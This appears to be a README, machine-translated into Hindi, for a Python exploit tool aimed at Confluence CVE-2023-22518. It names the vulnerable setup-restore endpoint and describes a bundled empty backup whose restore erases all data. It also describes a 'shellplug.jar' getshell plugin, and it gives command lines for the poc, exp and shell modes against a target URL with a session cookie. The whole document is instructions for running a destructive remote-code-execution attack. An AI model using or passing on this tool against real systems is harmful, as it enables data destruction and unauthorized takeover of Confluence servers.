
Confluence CVE-2023-22518
Confluence CVE-2023-22518 के लिए शोषण (बैकअप-रिस्टोर RCE)
POST /setup/setup-restore.action
मान्य लॉगिन और व्यवस्थापक अधिकारों की आवश्यकता है (या एक प्रमाणीकरण बायपास)
xmlexport-20231127-071916-1.zip – खाली Confluence बैकअप। इसे पुनर्स्थापित करने से सभी डेटा हट जाएगा!!!
इसे किसी भी बैकअप से बदलें; इसे स्क्रिप्ट के समान फ़ोल्डर में रखें।shellplug.jar – गेटशेल प्लगइन, CVE-2023-22515_RCE से लिया गया।python .\CVE-2023-22518.py -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗██╔════╝███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗╚██║╚█████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║ ██║██╔══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ███████╗███████╗███████║ ██║╚█████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: 代码仅供学习使用,请勿用于其他用途
optional arguments:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
-t TARGET, --target TARGET
लक्ष्य URL
-id JSESSIONID, --jsessionid JSESSIONID
JSESSIONID
--timeout TIMEOUT समय-समाप्ति (डिफ़ॉल्ट: 30 सेकंड)
--proxy PROXY प्रॉक्सी
python .\CVE-2023-22518.py poc -t http://IP:Port

Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py exp -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D

Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py shell -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
